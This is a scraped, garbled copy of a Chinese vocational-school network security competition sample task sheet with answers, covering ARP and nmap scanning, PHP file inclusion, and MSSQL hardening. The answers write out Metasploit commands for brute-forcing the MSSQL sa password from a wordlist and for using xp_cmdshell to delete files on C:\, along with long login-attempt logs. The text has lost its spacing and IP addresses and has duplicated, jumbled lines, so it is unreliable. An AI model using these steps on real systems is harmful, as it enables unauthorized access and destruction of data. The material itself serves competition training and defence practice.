江苏2018年中职组网络空间安全赛项样题及答案_第1页
江苏2018年中职组网络空间安全赛项样题及答案_第2页
江苏2018年中职组网络空间安全赛项样题及答案_第3页
江苏2018年中职组网络空间安全赛项样题及答案_第4页
江苏2018年中职组网络空间安全赛项样题及答案_第5页
已阅读5页,还剩7页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

百度文库2018年度全国职业技能大赛中职组“网络空间安全”赛项江苏省竞赛任务书(样题)一、竞赛时间9:00-12:00,共计3小时。二、竞赛阶段简介竞赛阶段任务阶段竞赛任务竞赛时间分值第一阶段单兵模式系统渗透测试任务1ARP协议渗透测试9:00-11:0015任务2操作系统及应用程序扫描渗透测试15任务3Web应用程序文件包含安全攻防20任务4数据库安全加固20第二阶段分组对抗系统加固11:00-11:1530渗透测试11:15-12:00百度文库三、竞赛任务书内容(一)拓扑图PC1PC2PC1PC2(二)第一阶段任务书任务扫描渗透测试任务环境说明:/服务器场景:/服务器场景操作系统:.通过PC2中渗透测试平台对服务器场景进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作使用命令中固定不变的字符串作为Flag提交;.Arping-c5通过PC2中渗透测试平台对服务器场景进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第2个数字作为Flag提交;Arping-c5arping-c5frometh0Unicastreplyfrom[00:0C:29:62:80:73]Unicastreplyfrom[00:0C:29:62:80:73]Unicastreplyfrom[00:0C:29:62:80:73] 百度文库 Unicastreplyfrom[00:0C:29:62:80:73]Unicastreplyfrom[00:0C:29:62:80:73]Sent5probes(1broadcast(s))Received5response(s)Flag:5.通过PC2中渗透测试平台对服务器场景进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3/…/字符串n)提交;msf>useauxiliary/scanner/discovery/arp_sweepFlag:Auxiliary/scanner/discovery/arp_sweep.通过PC2中渗透测试平台对服务器场景进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交;msf>useauxiliary/scanner/discovery/arp_sweepmsfauxiliary(arp_sweep)>run[appearstobeup(VMware,Inc.).[*]appearstobeup(VMware,Inc.).appearstobeup(VMware,Inc.).[*]appearstobeup(VMware,Inc.).[*]Scanned1of1hosts(100%complete)[*]AuxiliarymoduleexecutioncompletedFlag:appears6.通过PC2中渗透测试平台对服务器场景进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交;[*]appearstobeup(VMware,Inc.).[*]Scanned1of1hosts(100%complete)[*]AuxiliarymoduleexecutioncompletedFlag:completed5.通过PC2中渗透测试平台对服务器场景进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;msfauxiliary(arp_sweep)>run 百度文库 Flag:exploitorrun任务2.操作系统及应用程序扫描渗透测试任务环境说明:✓服务器场景:✓服务器场景操作系统:.通过PC2中渗透测试平台对服务器场景进行ping扫描渗透测试(使用工具nmap,使用参数5使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;.Flag:Nmap-n-Sp通过PC2中渗透测试平台对服务器场景进行ping扫描渗透测试(使用工具nmap),并将该操作显示结果的上数第3行左数第3个单词作为Flag提交;root@kali:~#nmap-n-sPNmap()at2017-12-1019:59ESTNmapscanreportforisuplatency).Nmapdone:1IPaddress(1hostup)scannedinsecondsFlag:up.通过PC2中渗透测试平台对服务器场景进行综合性扫描渗透测试(使用工具nmap,使用参数5使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;root@kali:~#nmap-n-ANmap()at2017-12-1020:11ESTNmapscanreportforisuplatency).Notshown:998closedportsPORT STATESERVICEVERSION22/tcpopenssh OpenSSH(protocol|ssh-hostkey:| 102495:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08(DSA)|_204890:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd(RSA)111/tcpopenrpcbind2(RPC#100000)|rpcinfo:|programversionport/protoservice| 1000002111/tcprpcbind| 1000002111/udprpcbind| 1000241910/udpstatus|_1000241913/tcpstatusMACAddress::00:0C:29:62:80:73(VMware)Devicetype:generalpurposeRunning:LinuxCPE:cpe:/o:linux:linux_kernel:OSdetails:Linux-Distance:1hopTRACEROUTE百度文库HOPRTTADDRESSmsandServicedetectionperformed.Pleasereportanyincorrectresultsatsubmit/.Nmapdone:1IPaddress(1hostup)scannedinseconds4.Flag:Nmap-n-A通过PC2中渗透测试平台对服务器场景进行综合性扫描渗透测试(使用工具nmap,使用参数5使用必须要使用的参数),并将该操作显示结果的最后1行最后1个单词作为Flag提交;root@kali:~#nmap-n-ANmap()at2017-12-1020:11ESTNmapscanreportforisuplatency).Notshown:998closedportsPORT STATESERVICEVERSION22/tcpopenssh OpenSSH(protocol|ssh-hostkey:| 102495:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08(DSA)|_204890:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd(RSA)111/tcpopenrpcbind2(RPC#100000)|rpcinfo:|programversionport/protoservice| 1000002111/tcprpcbind| 1000002111/udprpcbind| 1000241910/udpstatus|_1000241913/tcpstatusMACAddress::00:0C:29:62:80:73(VMware)Devicetype:generalpurposeRunning:LinuxCPE:cpe:/o:linux:linux_kernel:OSdetails:Linux-Distance:1hopTRACEROUTEHOPRTTADDRESS1msandServicedetectionperformed.Pleasereportanyincorrectresultsatsubmit/.Nmapdone:1IPaddress(1hostup)scannedinsecondsFlag:seconds通过PC2中渗透测试平台对服务器场景进行操作系统扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;root@kali:~#nmap-ONmap()at2017-12-1020:13ESTNmapscanreportforisuplatency).Notshown:998closedportsPORTSTATESERVICE22/tcpopenssh 百度文库 111/tcpopenrpcbindMACAddress:00:00:29:62:80:73(VMware)Devicetype:generalpurposeRunning:LinuxCPE:cpe:/o:linux:linux_kernel:OSdetails:Linux-Distance:1hopOSdetectionperformed.Pleasereportanyincorrectresultsatsubmit/.Nmapdone:1IPaddress(1hostup)scannedinsecondsFlag:Nmap-O通过通过PC2中渗透测试平台对服务器场景进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;Flag:Nmap-sV通过通过PC2中渗透测试平台对服务器场景进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作显示结果的SSH服务版本信息字符串作为Flag提交;root@kali:~#nmap-sVNmap()at2017-12-1020:17ESTNmapscanreportforisuplatency).Notshown:998closedportsPORTSTATESERVICEVERSION22/tcpopensshOpenSSH(protocol111/tcpopenrpcbind2(RPC#100000)MACAddress:00:0C:29:62:80:73(VMware)Servicedetectionperformed.Pleasereportanyincorrectresultsatsubmit/.Nmapdone:1IPaddress(1hostup)scannedinsecondsFlag:OpenSSH任务应用程序文件包含安全攻防任务环境说明:服务器场景名称:WebServ2003服务器场景安全操作系统:MicrosoftWindows2003Server服务器场景安装中间件:;服务器场景安装Web开发环境:Php6;服务器场景安装数据库:MicrosoftSqlServer2000;服务器场景安装文本编辑器:EditPlus;.访问WebServ2003服务器场景,"/"->"DisplayUploaded'sFileContent",分析该页面源程序,找到提交的变量名,并将该变量名作为Flag(形式:name=“变量名”)提交;百度文库.对该任务题目1页面注入点进行渗透测试,通过,并将注入语句作为Flag提交;.对该任务题目2页面注入点进行注入以后,将当前页面以Base64编码方式回显内容作为Flag提交;.通过「2函数对题目3中Base64编码回显内容进行解码,并将解码内容作为Flag提交;.进入WebServ2003服务器场景的目录,找到文件,使用EditPlus工具打开并填写该文件中空缺的F1、F2、F3、F4的值,使之可以抵御文件包含渗透测试,并提交Flag(形式:F1|F2|F3|F4);.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对WebServ2003服务器场景进行文件包含渗透测试无效,并将回显页面源文件内容作为Flag提交;任务4.数据库安全加固任务环境说明:服务器场景名称:WebServ2003服务器场景安全操作系统:MicrosoftWindows2003Server服务器场景安装中间件:;服务器场景安装Web开发环境:Php6;服务器场景安装数据库:MicrosoftSqlServer2000;服务器场景安装文本编辑器:EditPlus;.对服务器场景WebServ2003安装补丁,使其中的数据库MicrosoftSqlServer2000能够支持远程连接,并将补丁包程序所在目录名称作为Flag提交;.对服务器场景WebServ2003安装补丁,使其中的数据库MicrosoftSqlServer2000能够支持远程连接,在安装补丁后的服务器场景中运行netstat-an命令,将回显的数据库服务连接状态作为Flag提交;C:\DocumentsandSettings\Administrator>netstat-anActiveConnectionsProtoLocalAddress ForeignAddress StateTCP LISTENINGTCP LISTENINGTCP LISTENING

百度文库TCPTCPTCPTCPUDPUDPUDPUDPUDPUDPUDPUDPLISTENING****:*****:*****:****3.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试,并将扫描结果作为Flag提交;3.msf>useauxiliary/scanner/mssql/mssql_ping[*]二SERVER[+][+][+]二1433[+]-SQLServerinformationfor[*]二SERVER[+][+][+]二1433[+]-SQLServerinformationforInstanceNameIsClusteredVersion二MSSQLSERVER=NotcpServerName[*]Scanned1[*]Auxiliarynpof1hosts(100%

moduleexecution=\\SERVER\pipe\sql\querycomplete)completed4.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令暴力破解(使用PC2中的渗透测试平台中的字典文件),并将破解结果中的最后一个字符串作为Flag提交;4.msf>useauxiliary/scanner/mssql/mssql_loginmsfauxiliary(mssql_login)>setusernamesamsfauxiliary(mssql_login)>setpass_file/usr/share/wordlists/metasploit/msfauxiliary(mssql_login)>run[*][!][-][-][-][-][-]--MSSQL-Startingauthenticationscanner.-NoactiveDB--Credentialdatawillnotbesaved!-LOGIN-LOGIN-LOGIN[*][!][-][-][-][-][-]--MSSQL-Startingauthenticationscanner.-NoactiveDB--Credentialdatawillnotbesaved!-LOGIN-LOGIN-LOGIN-LOGIN-LOGINFAILEDFAILEDFAILEDFAILEDFAILEDWORKSTATION\sa:!@#$%(Incorrect:)WORKSTATION\sa:!@#$%^(Incorrect:)WORKSTATION\sa:!@#$%^&(Incorrect:)WORKSTATION\sa:!@#$%^&*(Incorrect:)WORKSTATION\sa:!boerbul(Incorrect:)百度文库[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][+]LOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILED--LOGINSUCCESSFUL:WORKSTATION\sa:123456WORKSTATION\sa:!boerseun(Incorrect:)WORKSTATION\sa:!gatvol(Incorrect:)WORKSTATION\sa:!hotnot(Incorrect:)WORKSTATION\sa:!kak(Incorrect:)WORKSTATION\sa:!koedoe(Incorrect:)WORKSTATION\sa:!likable(Incorrect:)WORKSTATION\sa:!poes(Incorrect:)WORKSTATION\sa:!pomp(Incorrect:)WORKSTATION\sa:!soutpiel(Incorrect:)WORKSTATION\sa:(Incorrect:)WORKSTATION\sa:0(Incorrect:)WORKSTATION\sa:OOOOOO(Incorrect:)WORKSTATION\sa:OOOOOOOO(Incorrect:)WORKSTATION\sa:OOO7(Incorrect:)WORKSTATION\sa:OO7(Incorrect:)WORKSTATION\sa:OO7OO7(Incorrect:)WORKSTATION\sa:Os(Incorrect:)WORKSTATION\sa:Oth(Incorrect:)WORKSTATION\sa:1(Incorrect:)WORKSTATION\sa:1O(Incorrect:)WORKSTATION\sa:1OO(Incorrect:)WORKSTATION\sa:1OOO(Incorrect:)WORKSTATION\sa:1OOOs(Incorrect:)WORKSTATION\sa:1OOs(Incorrect:)WORKSTATION\sa:1O22(Incorrect:)WORKSTATION\sa:1Os(Incorrect:)WORKSTATION\sa:1Osne1(Incorrect:)WORKSTATION\sa:1111(Incorrect:)WORKSTATION\sa:11111(Incorrect:)WORKSTATION\sa:111111(Incorrect:)WORKSTATION\sa:(Incorrect:)WORKSTATION\sa:112233(Incorrect:)WORKSTATION\sa:1212(Incorrect:)WORKSTATION\sa:121212(Incorrect:)WORKSTATION\sa:1213(Incorrect:)WORKSTATION\sa:1214(Incorrect:)WORKSTATION\sa:1225(Incorrect:)WORKSTATION\sa:123(Incorrect:)WORKSTATION\sa:123123(Incorrect:)WORKSTATION\sa:123321(Incorrect:)WORKSTATION\sa:1234(Incorrect:)WORKSTATION\sa:12345(Incorrect:)[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][+]LOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINLOGINFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILEDFAILED--LOGINSUCCESSFUL:WORKSTATION\sa:123456Scanned1of1hosts(1OO%complete)百度文库[*]AuxiliarymoduleexecutioncompletedFlag:completed5.通过PC2中del渗透测试平台对服务器场景WebServ2003进行数据库服务扩展存储过程进行利用,删除WebServ2003服务器场景C:\,并将渗透测试利用命令以及渗透测试平台^门结果第1行回显作为Flag提交;msfauxiliary(mssql_login)>useauxiliary/admin/mssql/mssql_execmsfauxiliary(mssql_exec)>setrhostauxiliary(mssql_exec)>setpassword123456msfauxiliary(mssql_exec)>setcmd/cdel"C:\\"msfauxiliary(mssql_exec)>run[*]-SQLQuery:EXECmaster..xp_cmdshell'/cdelC:\'output[*]AuxiliarymoduleexecutioncompletedFlag:[*]-SQLQuery:EXECmaster..xp_cmdshell'/cdelC:\6.通过对服务器场景WebServ2003的数据库服务进行安全加固,阻止PC2中渗透测试平台对其进行数据库超级管理员密码暴力破解渗透测试,并将加固身份验证选项中的最后一个字符串作为Flag提交:7.验证在WebServ2003的数据库服务进行安全加固后,再次通过PC2中渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令进行暴力破解(使用PC2中的渗透测试平台中的字典文件),并将破解结果的从上向下数第3行内容作为Flag提交;msfauxiliary(mssql_login)>run[*] --MSSQL-Startingauthenticationscanner.[!] -NoactiveDB--Credentialdatawillnotbesaved![-] --LOGINFAILED:WORKSTATION\sa:!@#$%(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:!@#$%^(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:!@#$%^&(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:!@#$%^&*(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:!boerbul(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:!boerseun(Incorrect:)10百度文库[-] --LOGINFAILED:WORKSTATION\sa:!gatvol(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:!hotnot(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:!kak(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:!koedoe(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:!likable(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:!poes(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:!pomp(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:!soutpiel(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:0(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:OOOOOO(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:OOOOOOOO(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:OOO7(Incorrect:)[-] --LOGINFAILED:WORKSTATION\sa:

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论